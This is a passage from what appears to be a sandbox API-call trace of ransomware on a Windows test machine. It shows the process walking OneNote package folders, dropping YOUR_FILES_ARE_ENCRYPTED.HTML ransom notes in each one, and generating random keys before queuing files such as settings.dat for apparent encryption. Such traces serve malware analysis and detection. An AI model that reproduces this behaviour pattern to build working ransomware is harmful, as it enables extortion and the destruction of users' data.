pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 188 [0116.870] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.870] lstrlenW (lpString=".LOG1") returned 5 [0116.870] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.870] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x654edd0a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x654edd0a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x654edd0a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315d340, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0116.870] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.870] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 188 [0116.870] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.870] lstrlenW (lpString=".LOG2") returned 5 [0116.870] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.870] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x654edd0a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x654edd0a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x654edd0a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315d340, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0116.870] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.870] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 193 [0116.870] GetProcessHeap () returned 0x600000 [0116.870] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\microsoft.office.onenote_17.6131.10051.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.871] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.871] CloseHandle (hObject=0x214) returned 1 [0116.871] GetProcessHeap () returned 0x600000 [0116.872] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.872] GetProcessHeap () returned 0x600000 [0116.872] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.872] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6545cdca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6545cdca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x65513f2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0116.872] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.872] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 177 [0116.872] GetProcessHeap () returned 0x600000 [0116.872] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Microsoft.Office.OneNote_17.6131.10051.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\microsoft.office.onenote_17.6131.10051.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.874] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.875] CloseHandle (hObject=0x320) returned 1 [0116.875] GetProcessHeap () returned 0x600000 [0116.875] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.875] GetProcessHeap () returned 0x600000 [0116.875] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.875] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.875] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.875] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState") returned 100 [0116.875] GetProcessHeap () returned 0x600000 [0116.875] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.875] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState" [0116.876] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState\\*" [0116.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.876] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.876] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 0 [0116.876] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.876] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0116.876] GetProcessHeap () returned 0x600000 [0116.876] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.876] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.877] CloseHandle (hObject=0x320) returned 1 [0116.877] GetProcessHeap () returned 0x600000 [0116.877] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.877] GetProcessHeap () returned 0x600000 [0116.877] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.877] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b6436c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.877] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.877] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings") returned 96 [0116.878] GetProcessHeap () returned 0x600000 [0116.878] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.878] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings" [0116.878] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\*" [0116.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b6436c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.878] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b6436c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.878] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b6436c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64b6436c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64b6436c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.878] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.878] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 109 [0116.878] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.878] lstrlenW (lpString=".lock") returned 5 [0116.878] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.878] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64acb91c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.878] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.878] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\settings.dat") returned 109 [0116.878] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.878] lstrlenW (lpString=".dat") returned 4 [0116.878] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.878] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0116.879] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0116.879] GetProcessHeap () returned 0x600000 [0116.879] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.880] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="4A") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="B2") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="B6") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="18") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="E3") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="04") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="3D") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="9B") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7B") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="17") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F4") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="61") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="D5") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="96") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="1F") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="DD") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="4F") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="35") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A7") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="B3") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="43") returned 2 [0116.880] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="9C") returned 2 [0116.880] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="DB") returned 2 [0116.880] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="13") returned 2 [0116.881] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="96") returned 2 [0116.881] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B6") returned 2 [0116.881] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="BD") returned 2 [0116.881] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="CC") returned 2 [0116.881] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="29") returned 2 [0116.881] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="B7") returned 2 [0116.881] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="4D") returned 2 [0116.881] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="53") returned 2 [0116.881] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\settings.dat" [0116.881] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.881] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.881] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64acb91c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0116.881] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.881] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0116.881] GetProcessHeap () returned 0x600000 [0116.881] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.882] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.883] CloseHandle (hObject=0x320) returned 1 [0116.883] GetProcessHeap () returned 0x600000 [0116.883] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.883] GetProcessHeap () returned 0x600000 [0116.883] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.883] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64acb91c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64acb91c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.883] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.883] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData") returned 101 [0116.883] GetProcessHeap () returned 0x600000 [0116.883] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.883] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData" [0116.883] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData\\*" [0116.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: 